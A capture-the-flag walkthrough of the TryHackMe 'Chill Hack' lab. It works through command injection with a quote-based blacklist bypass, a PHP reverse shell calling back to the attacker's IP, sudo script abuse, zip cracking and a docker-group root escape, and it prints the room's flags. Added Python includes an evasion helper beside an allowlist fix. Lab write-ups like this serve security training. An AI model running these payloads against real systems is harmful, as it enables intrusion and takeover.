# Chill Hack

{% embed url="<https://tryhackme.com/room/chillhack>" %}


## Task 1 Investigate!

### User Flag

* Let's run a simple `nmap` scan against the target machine.

```
$ nmap -sC -sV 10.10.159.234
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-14 13:23 IST
Nmap scan report for 10.10.159.234
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.17.48.138
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Game Info
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.15 seconds
```

* There are three open ports:

| Port | Service |
| ---- | ------- |
| 21   | ftp     |
| 22   | ssh     |
| 80   | http    |

* We can connect anonymously through FTP.

```
$ ftp anonymous@10.10.159.234
Connected to 10.10.159.234.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
```

* There is a `note.txt` file that we can download to our machine using the `get` command.

```
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||62537|)
150 Opening BINARY mode data connection for note.txt (90 bytes).
100% |***********************************************************************************************************************************************************************************************|    90      348.77 KiB/s    00:00 ETA
226 Transfer complete.
90 bytes received in 00:00 (0.68 KiB/s)
```

* Let's `cat` out the `note.txt` file.

```
$ cat note.txt   
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
```

* So somewhere on the web server there is a page that passes user input to a command, with a string filter sitting in front of it.
* Let's find that page with `gobuster`.

```
$ gobuster dir -u http://10.10.159.234 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.159.234
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/css                  (Status: 301) [Size: 312] [--> http://10.10.159.234/css/]
/fonts                (Status: 301) [Size: 314] [--> http://10.10.159.234/fonts/]
/images               (Status: 301) [Size: 315] [--> http://10.10.159.234/images/]
/index.html           (Status: 200) [Size: 35184]
/js                   (Status: 301) [Size: 311] [--> http://10.10.159.234/js/]
/secret               (Status: 301) [Size: 315] [--> http://10.10.159.234/secret/]
/server-status        (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
```

* The `/secret` page looks interesting, let's visit it through our browser.

<figure><img src="/files/C4LH1Y5ftBbS6CTCHk8h" alt=""><figcaption></figcaption></figure>

* As we can see this is the page where we can input commands.
* Let's pass the following command:

```
id
```

<figure><img src="/files/pR19KPPL2DFVQW6AU8ZU" alt=""><figcaption></figcaption></figure>

* Looks like it worked.
* Let's list out the content of the directory:

```
ls -la
```

<figure><img src="/files/ShLhZL9px2P1fOcpPiLL" alt=""><figcaption></figcaption></figure>

* So `ls` matched a blacklisted string and was filtered, while `id` was not.
* We can try to bypass the filter by inserting single quotes inside the word: the filter compares the literal text `l's'`, which is not `ls`, but the shell removes the quotes before executing and still runs `ls -la`.

```
l's' -la
```

<figure><img src="/files/ojvDYi9Lz56Vf0D1WyXt" alt=""><figcaption></figcaption></figure>

* There is an `index.php` file. If we can manage to read it, we might be able to see how the black-list is implemented.
* Let's `cat` it out.

```
cat index.php
```

<figure><img src="/files/5e2rEFeaaKcCqKGKY7fi" alt=""><figcaption></figcaption></figure>

* We can do the same bypass as before with single quotes:

```
c'a't index.php
```

<figure><img src="/files/kbNZ1P1A1JSZLfNZSpUr" alt=""><figcaption></figcaption></figure>

* The layout looks different because the `index.php` source was sent back into the page and the browser rendered the HTML it contains; `cat` does not execute the PHP logic.
* We can now read the raw source with `CTRL+U` (view page source).

<figure><img src="/files/KhN5Kp6EtgXjD19bVhoR" alt=""><figcaption></figcaption></figure>

* Now we know which strings are being filtered.

```php
$blacklist = array('nc', 'python', 'bash','php','perl','rm','cat','head','tail','python3','more','less','sh','ls');
```
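The bypass works because the filter and the shell parse the input differently: the filter looks at the literal text, the shell strips the quotes first. The Python below is an added illustration, not the room's `index.php`. It models the blacklist as a word-by-word comparison (the page shows only the array, so the comparison logic is an assumption, chosen because it matches what the page observed: `ls` blocked, `l's'` allowed, `/bin/sh` inside the PHP payload allowed), rewrites any blacklisted word with the quote trick, checks with `shlex` that the shell still sees the original argv, and places a hardened allowlist check beside it. `ALLOWED`, `allowlisted_argv` and `run_allowlisted` are hypothetical names for illustration.

```python
import shlex
import subprocess

# The blacklist exactly as it appears in the page's index.php.
BLACKLIST = ['nc', 'python', 'bash', 'php', 'perl', 'rm', 'cat', 'head',
             'tail', 'python3', 'more', 'less', 'sh', 'ls']

def is_blocked(cmd, blacklist=BLACKLIST):
    """Model of the page's filter. Assumption: the page shows only the array,
    not the comparison, so this compares each whitespace-separated word of the
    raw input against the list unmodified. That is consistent with what the
    page observed: `ls -la` rejected, `l's' -la` accepted, and `/bin/sh` inside
    the PHP payload accepted."""
    return any(word in blacklist for word in cmd.split())

def evade(cmd, blacklist=BLACKLIST):
    """Rewrite each blacklisted word as X'YZ' (first character, then the rest
    in single quotes), the trick used on the page. The filter compares literal
    text and no longer matches; the shell strips the quotes before executing,
    so argv is unchanged. shlex.split implements POSIX word splitting, so it is
    used here to confirm that claim and to refuse any rewrite that would alter
    argv (for example a blacklisted word inside a double-quoted string, where
    the inserted single quotes would be taken literally)."""
    words = cmd.split(' ')
    rewritten = ' '.join(w[0] + "'" + w[1:] + "'" if w in blacklist else w
                         for w in words)
    if shlex.split(rewritten) != shlex.split(cmd):
        raise ValueError("rewrite changes the command: %r" % rewritten)
    return rewritten

# Hardened counterpart. Assumption: ALLOWED is whatever the application
# legitimately needs to run; the room's application has no such list.
ALLOWED = {'id', 'uptime', 'date'}

def allowlisted_argv(cmd, allowed=ALLOWED):
    """Split the input with shlex (no shell involved) and accept it only if
    the program name is allowlisted. The check is on the parsed argv[0], so
    quote tricks cannot hide the program name, and because the command is
    later run without a shell, `;`, `$(...)`, pipes and redirections are
    never interpreted. Returns argv, or None to reject."""
    try:
        argv = shlex.split(cmd)
    except ValueError:          # unbalanced quotes
        return None
    if not argv or argv[0] not in allowed:
        return None
    return argv

def run_allowlisted(cmd, allowed=ALLOWED):
    """Run an allowlisted command without a shell; reject everything else."""
    argv = allowlisted_argv(cmd, allowed)
    if argv is None:
        return "Are you a hacker?"
    return subprocess.run(argv, capture_output=True, text=True,
                          timeout=5).stdout

if __name__ == "__main__":
    # Constructed inputs: the three commands the page sends through the filter.
    for original in ["ls -la", "cat index.php",
                     'php -r \'$sock=fsockopen("10.17.48.138",9999);'
                     'exec("/bin/sh -i <&3 >&3 2>&3");\'']:
        bypass = evade(original)
        print("%-60s blocked=%s" % (original, is_blocked(original)))
        print("%-60s blocked=%s" % (bypass, is_blocked(bypass)))
    print(allowlisted_argv("id"), allowlisted_argv("c'at' /etc/passwd"),
          allowlisted_argv("id; l's'"))
```

The point of `allowlisted_argv` is that the decision is made on what the shell would execute, not on the raw string, and the execution path never involves a shell at all; a blacklist on raw text can always be rewritten around, as the three `evade` calls show.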

* Let's set up a `nc` listener.

```
$ nc -nlvp 9999
Listening on [any] 9999...
```

* Now we send a PHP reverse shell, again breaking the blacklisted word `php` with quotes. Note that `/bin/sh` inside the payload goes through untouched, so the filter evidently is not a plain substring match across the whole line:

```
p'h'p -r '$sock=fsockopen("10.17.48.138",9999);exec("/bin/sh -i <&3 >&3 2>&3");'
```

<figure><img src="/files/RU99J3IsgevHbCMJAFrx" alt=""><figcaption></figcaption></figure>

* Let's check back on our listener.

```
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.159.234] 39848
/bin/sh: 0: can't access tty; job control turned off
$ 
```

* We can upgrade to a stable TTY shell using the following command:

```
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/secret$
```

* Let's check which commands the `www-data` user can run with `sudo`.

```
www-data@ubuntu:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
```

* Let's take a closer look at what `.helpline.sh` does.

```
www-data@ubuntu:/home$ cat /home/apaar/.helpline.sh
cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
```

* The script expands `$msg` unquoted and runs it as a command (the `2>/dev/null` only hides errors), and `sudo` lets `www-data` run the script as `apaar` without a password. So whatever we type as the message executes as `apaar`, which means we should be able to get a shell.

```
www-data@ubuntu:/var/www/files/images$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: knign
knign
Hello user! I am knign,  Please enter your message: /bin/bash
/bin/bash
id
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
apaar@ubuntu:/var/www/files/images$ 
```

* Let's get the user flag from `/home/apaar/local.txt`.

```
apaar@ubuntu:~$ cat /home/apaar/local.txt
cat /home/apaar/local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
```

### Answer

```
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
```


### Root Flag

* Back in the `apaar` shell, let's list the contents of `/var/www/files/images`.

```
apaar@ubuntu:/var/www/files/images$ ls -la
ls -la
total 2112
drwxr-xr-x 2 root root    4096 Oct  3  2020 .
drwxr-xr-x 3 root root    4096 Oct  3  2020 ..
-rw-r--r-- 1 root root 2083694 Oct  3  2020 002d7e638fb463fb7a266f5ffc7ac47d.gif
-rw-r--r-- 1 root root   68841 Oct  3  2020 hacker-with-laptop_23-2147985341.jpg
```

* We can see that there is a JPG image.
* Let's serve the directory with Python's `http.server` so that we can pull this file to our attacker machine.

```
apaar@ubuntu:/var/www/files/images$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

* On our attacker machine we can use `wget` to download the JPG file.

```
$ wget http://10.10.159.234:8000/hacker-with-laptop_23-2147985341.jpg
--2023-12-14 15:15:45--  http://10.10.159.234:8000/hacker-with-laptop_23-2147985341.jpg
Connecting to 10.10.159.234:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68841 (67K) [image/jpeg]
Saving to: ‘hacker-with-laptop_23-2147985341.jpg’

hacker-with-laptop_23-2147985341.jpg                       100%[========================================================================================================================================>]  67.23K   182KB/s    in 0.4s    

2023-12-14 15:15:46 (182 KB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841]
```

* Using `steghide` we can check whether there is an embedded file or message and extract it. The passphrase here is empty (just press Enter).

```
$ steghide extract -sf hacker-with-laptop_23-2147985341.jpg 
Enter passphrase: 
wrote extracted data to "backup.zip".
```

* Let's `unzip` the ZIP file.

```
$ unzip backup.zip                    
Archive:  backup.zip
[backup.zip] source_code.php password: 
```

* In order to unzip it we need a password.
* We can use `zip2john` to convert the ZIP file into a hash that `john` can crack.

```
$ zip2john backup.zip > backup_hash
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8
```

* Now, using `john` we can crack the hash.

```
$ john --wordlist=/usr/share/wordlists/rockyou.txt backup_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word        (backup.zip/source_code.php)     
1g 0:00:00:00 DONE (2023-12-14 15:18) 4.166g/s 51200p/s 51200c/s 51200C/s horoscope..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

* Let's unzip the file using the `pass1word` password.

```
$ unzip backup.zip                                         
Archive:  backup.zip
[backup.zip] source_code.php password: 
  inflating: source_code.php      
```

{% code title="source\_code.php" %}

```php
<?php
        if(isset($_POST['submit']))
        {
                $email = $_POST["email"];
                $password = $_POST["password"];
                if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
                { 
                        $random = rand(1000,9999);?><br><br><br>
                        <form method="POST">
                                Enter the OTP: <input type="number" name="otp">
                                <input type="submit" name="submitOtp" value="Submit">
                        </form>
                <?php   mail($email,"OTP for authentication",$random);
                        if(isset($_POST["submitOtp"]))
                                {
                                        $otp = $_POST["otp"];
                                        if($otp == $random)
                                        {
                                                echo "Welcome Anurodh!";
                                                header("Location: authenticated.php");
                                        }
                                        else
                                        {
                                                echo "Invalid OTP";
                                        }
                                }
                }
                else
                {
                        echo "Invalid Username or Password";
                }
        }
?>
```

{% endcode %}

* In `source_code.php` the login check compares the Base64 encoding of the submitted password against a hardcoded string, and a successful login greets the user `Anurodh`. Base64 is an encoding, not a hash, so the cleartext password is recoverable.
* Let's decode it with `base64`.

```
$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
!d0ntKn0wmYp@ssw0rd            
```

* We can now login through SSH as the user `anurodh` using the `!d0ntKn0wmYp@ssw0rd` password.

```
$ ssh anurodh@10.10.159.234                                
The authenticity of host '10.10.159.234 (10.10.159.234)' can't be established.
ED25519 key fingerprint is SHA256:mDI9eoI+sD1gmuE1Vl2iLvyVIopHnZlbAEFxr82BFwc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.159.234' (ED25519) to the list of known hosts.
anurodh@10.10.159.234's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Dec 14 09:53:01 UTC 2023

  System load:  0.08               Processes:              134
  Usage of /:   24.8% of 18.57GB   Users logged in:        0
  Memory usage: 22%                IP address for eth0:    10.10.159.234
  Swap usage:   0%                 IP address for docker0: 172.17.0.1


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

19 packages can be updated.
0 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

anurodh@ubuntu:~$ 
```

* Using the `id` command we can check the groups that the `anurodh` user is part of.

```
anurodh@ubuntu:~$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
```

* So the `anurodh` user is part of the `docker` group, which means it can talk to the Docker daemon directly, and the daemon runs as root.
* GTFOBins lists a privilege escalation for exactly this situation.
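Membership of `docker` (and a few similar groups) is worth checking automatically on every shell you land, not just when a write-up points at it. The helper below is an added example, not part of the room or of this write-up's original steps: it parses `id` output and reports groups whose membership is in practice equivalent to root. The `PRIV_GROUPS` table and its descriptions are my own selection, not something the page provides; the sample `id` lines are the ones seen on this page.

```python
import re

# Groups whose membership is routinely equivalent to root on a Linux host.
# docker is the one exploited on this page; the others are included so the
# helper is useful as a general post-exploitation check (my own selection).
PRIV_GROUPS = {
    "docker": "can run `docker run -v /:/mnt --rm -it alpine chroot /mnt sh` without sudo",
    "lxd": "can launch a privileged container with the host filesystem mounted",
    "disk": "can read and write raw block devices, hence every file on the host",
    "sudo": "run `sudo -l` to see what is permitted",
    "adm": "can read system logs, which frequently contain credentials",
}

# id(1) prints: uid=N(name) gid=N(name) groups=N(name),N(name),...
# Group names may contain '-' (www-data), so match anything up to ')'.
_ID_RE = re.compile(r"^uid=(\d+)\(([^)]+)\)\s+gid=(\d+)\(([^)]+)\)\s+groups=(.*)$")

def parse_id(line):
    """Parse one line of id(1) output into (uid, user, [group names]).
    Entries without a name (a bare gid such as `11`) are skipped."""
    m = _ID_RE.match(line.strip())
    if not m:
        raise ValueError("not an id(1) line: %r" % line)
    names = re.findall(r"\d+\(([^)]+)\)", m.group(5))
    return int(m.group(1)), m.group(2), names

def risky_groups(line):
    """Return [(group, why it matters)] for every privilege-equivalent group
    the user in this id line belongs to; empty list if none."""
    _, _, groups = parse_id(line)
    return [(g, PRIV_GROUPS[g]) for g in groups if g in PRIV_GROUPS]

if __name__ == "__main__":
    # Constructed sample: the two id lines seen on this page.
    for line in [
        "uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)",
        "uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)",
    ]:
        print(line)
        hits = risky_groups(line) or [("-", "no privilege-equivalent groups")]
        for group, why in hits:
            print("  %-7s %s" % (group, why))
```

On a live box, pipe `id` into it (`id | python3 check_groups.py` after replacing the sample list with `sys.stdin`), or feed it the `id` lines collected from each account you compromise; the `apaar` line comes back clean while the `anurodh` line flags `docker`, which is exactly the distinction that decides the next step here.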

<figure><img src="/files/AKD64hQsPU3jx2AwXFJb" alt=""><figcaption></figcaption></figure>

```
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```

* Because the `docker` group grants access to the daemon directly, we can run the GTFOBins command without `sudo`. It starts an `alpine` container with the host's root filesystem bind-mounted at `/mnt` and `chroot`s into it, so the shell we get is root on the host.

```
anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
```

* We are now `root` and can read the root flag.

```
# cat /root/proof.txt
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}}
```

### Answer

```
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}}
```

